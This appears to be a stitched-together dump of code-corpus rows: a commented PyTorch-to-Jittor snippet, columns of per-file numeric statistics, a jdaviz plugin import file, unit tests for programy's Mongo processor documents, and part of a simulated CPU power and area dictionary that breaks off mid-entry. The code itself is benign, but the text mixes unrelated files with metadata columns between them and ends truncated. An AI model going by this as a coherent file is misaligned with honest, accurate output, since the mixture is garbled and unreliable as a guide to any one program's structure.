# return F.sigmoid(d0), F.sigmoid(d1), F.sigmoid(d2), F.sigmoid(d3), F.sigmoid(d4), F.sigmoid(d5), F.sigmoid(d6)
# """
# jittor_code = convert(pytorch_code)
# print(jittor_code)
| 34.622222
| 208
| 0.588954
| 4,869
| 34,276
| 4.001027
| 0.050729
| 0.045686
| 0.039731
| 0.050716
| 0.951953
| 0.94913
| 0.94297
| 0.937683
| 0.936143
| 0.900159
| 0
| 0.087079
| 0.255543
| 34,276
| 990
| 209
| 34.622222
| 0.676373
| 0.447835
| 0
| 0.733333
| 0
| 0.005556
| 0.021418
| 0.001424
| 0
| 0
| 0
| 0
| 0
| 1
| 0.061111
| false
| 0
| 0.011111
| 0
| 0.125
| 0.013889
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
edd8c7fdaef9b6620dfe6b80f62f514ea56c8aa2
| 162
|
py
|
Python
|
jdaviz/configs/cubeviz/plugins/__init__.py
|
check-spelling/jdaviz
|
bfd0514d13bdc6fa0b8c8536a603293409270337
|
[
"MIT",
"BSD-3-Clause"
] | 55
|
2019-05-24T18:53:05.000Z
|
2022-03-14T08:45:52.000Z
|
jdaviz/configs/cubeviz/plugins/__init__.py
|
check-spelling/jdaviz
|
bfd0514d13bdc6fa0b8c8536a603293409270337
|
[
"MIT",
"BSD-3-Clause"
] | 1,105
|
2019-05-09T15:17:35.000Z
|
2022-03-31T21:22:18.000Z
|
jdaviz/configs/cubeviz/plugins/__init__.py
|
rosteen/jdaviz
|
e02c08d68ef71c5e40600785f46e65e5ae95e236
|
[
"MIT",
"BSD-3-Clause"
] | 49
|
2019-05-07T18:05:42.000Z
|
2022-03-22T15:15:34.000Z
|
from .viewers import * # noqa
from .unified_slider.unified_slider import * # noqa
from .parsers import * # noqa
from .moment_maps.moment_maps import * # noqa
| 32.4
| 52
| 0.740741
| 22
| 162
| 5.272727
| 0.409091
| 0.344828
| 0.362069
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.17284
| 162
| 4
| 53
| 40.5
| 0.865672
| 0.117284
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b670a377acec8e7943980e7d67cb8514cb48bdc9
| 4,466
|
py
|
Python
|
test/programytest/storage/stores/nosql/mongo/dao/test_processor.py
|
NeolithEra/program-y
|
8c2396611f30c8095e98ff02988223a641c1a3be
|
[
"MIT"
] | null | null | null |
test/programytest/storage/stores/nosql/mongo/dao/test_processor.py
|
NeolithEra/program-y
|
8c2396611f30c8095e98ff02988223a641c1a3be
|
[
"MIT"
] | null | null | null |
test/programytest/storage/stores/nosql/mongo/dao/test_processor.py
|
NeolithEra/program-y
|
8c2396611f30c8095e98ff02988223a641c1a3be
|
[
"MIT"
] | null | null | null |
import unittest
from programy.storage.stores.nosql.mongo.dao.processor import PreProcessor
from programy.storage.stores.nosql.mongo.dao.processor import PostProcessor
from programy.storage.stores.nosql.mongo.dao.processor import PostQuestionProcessor
class PreProcessorTests(unittest.TestCase):
    """Serialisation round-trip tests for the mongo DAO PreProcessor."""

    def test_init_no_id(self):
        # A freshly constructed processor has no id and omits '_id' when serialised.
        proc = PreProcessor(classname="test.processorclass")
        self.assertIsNotNone(proc)
        self.assertIsNone(proc.id)
        self.assertEqual("test.processorclass", proc.classname)
        self.assertEqual({'classname': 'test.processorclass'}, proc.to_document())

    def test_init_with_id(self):
        # Once an id is assigned it must appear as '_id' in the document.
        proc = PreProcessor(classname="test.processorclass")
        proc.id = '666'
        self.assertIsNotNone(proc)
        self.assertIsNotNone(proc.id)
        self.assertEqual('666', proc.id)
        self.assertEqual("test.processorclass", proc.classname)
        self.assertEqual({'_id': '666', 'classname': 'test.processorclass'}, proc.to_document())

    def test_from_document(self):
        # Deserialising without '_id' leaves id unset.
        without_id = PreProcessor.from_document({'classname': 'test.processorclass'})
        self.assertIsNotNone(without_id)
        self.assertIsNone(without_id.id)
        self.assertEqual("test.processorclass", without_id.classname)
        # Deserialising with '_id' restores the id.
        with_id = PreProcessor.from_document({'_id': '666', 'classname': 'test.processorclass'})
        self.assertIsNotNone(with_id)
        self.assertIsNotNone(with_id.id)
        self.assertEqual('666', with_id.id)
        self.assertEqual("test.processorclass", with_id.classname)
class PostProcessorTests(unittest.TestCase):
    """Serialisation round-trip tests for the mongo DAO PostProcessor."""

    def test_init_no_id(self):
        # A freshly constructed processor has no id and omits '_id' when serialised.
        proc = PostProcessor(classname="test.processorclass")
        self.assertIsNotNone(proc)
        self.assertIsNone(proc.id)
        self.assertEqual("test.processorclass", proc.classname)
        self.assertEqual({'classname': 'test.processorclass'}, proc.to_document())

    def test_init_with_id(self):
        # Once an id is assigned it must appear as '_id' in the document.
        proc = PostProcessor(classname="test.processorclass")
        proc.id = '666'
        self.assertIsNotNone(proc)
        self.assertIsNotNone(proc.id)
        self.assertEqual('666', proc.id)
        self.assertEqual("test.processorclass", proc.classname)
        self.assertEqual({'_id': '666', 'classname': 'test.processorclass'}, proc.to_document())

    def test_from_document(self):
        # Deserialising without '_id' leaves id unset.
        without_id = PostProcessor.from_document({'classname': 'test.processorclass'})
        self.assertIsNotNone(without_id)
        self.assertIsNone(without_id.id)
        self.assertEqual("test.processorclass", without_id.classname)
        # Deserialising with '_id' restores the id.
        with_id = PostProcessor.from_document({'_id': '666', 'classname': 'test.processorclass'})
        self.assertIsNotNone(with_id)
        self.assertIsNotNone(with_id.id)
        self.assertEqual('666', with_id.id)
        self.assertEqual("test.processorclass", with_id.classname)
class PostQuestionProcessorTests(unittest.TestCase):
    """Serialisation round-trip tests for the mongo DAO PostQuestionProcessor."""

    def test_init_no_id(self):
        # A freshly constructed processor has no id and omits '_id' when serialised.
        proc = PostQuestionProcessor(classname="test.processorclass")
        self.assertIsNotNone(proc)
        self.assertIsNone(proc.id)
        self.assertEqual("test.processorclass", proc.classname)
        self.assertEqual({'classname': 'test.processorclass'}, proc.to_document())

    def test_init_with_id(self):
        # Once an id is assigned it must appear as '_id' in the document.
        proc = PostQuestionProcessor(classname="test.processorclass")
        proc.id = '666'
        self.assertIsNotNone(proc)
        self.assertIsNotNone(proc.id)
        self.assertEqual('666', proc.id)
        self.assertEqual("test.processorclass", proc.classname)
        self.assertEqual({'_id': '666', 'classname': 'test.processorclass'}, proc.to_document())

    def test_from_document(self):
        # Deserialising without '_id' leaves id unset.
        without_id = PostQuestionProcessor.from_document({'classname': 'test.processorclass'})
        self.assertIsNotNone(without_id)
        self.assertIsNone(without_id.id)
        self.assertEqual("test.processorclass", without_id.classname)
        # Deserialising with '_id' restores the id.
        with_id = PostQuestionProcessor.from_document({'_id': '666', 'classname': 'test.processorclass'})
        self.assertIsNotNone(with_id)
        self.assertIsNotNone(with_id.id)
        self.assertEqual('666', with_id.id)
        self.assertEqual("test.processorclass", with_id.classname)
| 42.533333
| 108
| 0.71451
| 422
| 4,466
| 7.462085
| 0.082938
| 0.171483
| 0.154335
| 0.080025
| 0.930772
| 0.930772
| 0.930772
| 0.901556
| 0.901556
| 0.809146
| 0
| 0.019344
| 0.166592
| 4,466
| 104
| 109
| 42.942308
| 0.826706
| 0
| 0
| 0.835443
| 0
| 0
| 0.16592
| 0
| 0
| 0
| 0
| 0
| 0.607595
| 1
| 0.113924
| false
| 0
| 0.050633
| 0
| 0.202532
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b67f70c44d341391e6967880195ac974cc3cdb39
| 68,566
|
py
|
Python
|
benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_rr/cmp_calculix/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_rr/cmp_calculix/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_rr/cmp_calculix/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.453547,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.558924,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 2.4478,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.735586,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 1.27377,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.730543,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 2.7399,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.351814,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 9.97467,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.462441,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0266656,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.362687,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.197208,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.825128,
'Execution Unit/Register Files/Runtime Dynamic': 0.223874,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 1.00065,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 1.94454,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 5.87261,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.0014753,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.0014753,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00127541,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000488495,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00283291,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00705891,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0144871,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.189581,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.43323,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.47087,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.643904,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.96874,
'Instruction Fetch Unit/Runtime Dynamic': 1.3259,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.124627,
'L2/Runtime Dynamic': 0.00677539,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 4.55449,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.59717,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.107325,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.107325,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 5.06337,
'Load Store Unit/Runtime Dynamic': 2.23379,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.264645,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.52929,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0939234,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0957804,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.399995,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0772353,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.720869,
'Memory Management Unit/Runtime Dynamic': 0.173016,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 29.414,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 1.61335,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0570278,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.344076,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 2.01446,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 11.6265,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.235949,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.388014,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 1.27351,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.332422,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.536185,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.270648,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.13925,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.184947,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 6.4292,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.240594,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0139433,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.189191,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.103119,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.429785,
'Execution Unit/Register Files/Runtime Dynamic': 0.117062,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.457573,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.898371,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 2.94808,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
